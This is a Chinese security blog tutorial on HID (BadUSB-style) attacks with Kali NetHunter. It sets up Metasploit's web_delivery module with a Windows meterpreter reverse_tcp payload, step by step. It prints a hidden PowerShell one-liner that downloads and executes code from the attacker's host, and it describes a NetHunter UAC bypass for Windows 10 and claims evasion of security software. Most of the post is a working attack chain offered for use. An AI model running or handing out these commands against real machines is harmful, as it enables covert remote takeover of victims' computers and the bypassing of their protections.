最新消息:

玩转NetHunter:手到擒来的HID攻击(内附视频及彩蛋)

Kali Linux Eternal 2964浏览 0评论

HID攻击介绍

HID是(Human Interface Device)的缩写,由其名称可以了解HID设备是直接与人交互的设备,例如键盘、鼠标与游戏杆等。不过HID设备并不一定要有人机接口,只要符合HID类别规范的设备都是HID设备。一般来讲针对HID的攻击主要集中在键盘鼠标上,因为只要控制了用户键盘,基本上就等于控制了用户的电脑。攻击者会把攻击代码,隐藏在一个正常的鼠标键盘中,当用户将含有攻击向量的鼠标或键盘插入电脑时,恶意代码会被加载并执行。

话不多说,下面我将利用 Metasploit 的 web_delivery 模块,结合 nethunter 的 HID 攻击来完成本次演示!

Metasploit之payload的构造

第一步:选择使用 msf 的 web_delivery 模块:

use exploit/multi/script/web_delivery

第二步:使用 show opinions 查看相关配置参数:

 show options


第三步:查看 target 包含多少可选的目标选项,使用以下参数查看:

    show targets

可以看到这里支持:Python/PHP/powershell 三种脚本。

第四步:设置 target 这里我们选择 2 powershell 脚本。

  set target 2

第五步:设置 payload 选项,设置 windows(powershell)反弹 shell 链接:

 set payload windows/meterpreter/reverse_tcp

第六步:设置攻击者-端口默认是:4444 也可以更改,这里我就直接使用默认端口:

   set LHOST 192.168.1.101

第七步:设置 uripath 路径 设置为根目录—– ‘/‘

   set URIPATH   /

第八步:执行

   exploit

第九步:将以下生成的代码,复制到目标机器的 cmd 命令终端窗口内(思路:可以结合“Badusb”使用)。

   powershell.exe -nop -w hidden -c $O=new-object net.webclient;$O.proxy=[Net.WebRequest]::GetSystemWebProxy();$O.Proxy.Credentials[Net.CredentialCache]::DefaultCredentials;IEX $O.downloadstring(‘http://192.168.1.101:8080/‘);

第十步:打开 kali_Nethunter 客户端界面,开启 apache 等服务,并对代码进行基本的参数设置。

详细步骤,请参看以下视频:

 http://oc78wb8cz.bkt.clouddn.com/HID_Attacks.mp4

1.首先我们选择菜单界面的 HID Attacks 选项。

 

2.可以看到,这里有过windows UAC的选项及相关操作选项。

 

3.我们点击UAC bypass选项,要求我们选择对应的windows版本,这里我选择Windows10

 

4.我们结合msf下的web_delivery模块执行攻击:

exploit/multi/script/web_delivery

5.从被动到主动,主动/自动展开攻击,最终得到我们想要的meterpreter shell

彩蛋:

利用web_delivery模块,成功绕过某安全防护软件:

*本文由 即刻安全Demon 原创发布!

转载请注明:即刻安全 » 玩转NetHunter:手到擒来的HID攻击(内附视频及彩蛋)

您必须 登录 才能发表评论!

网友最新评论 (1)



合作伙伴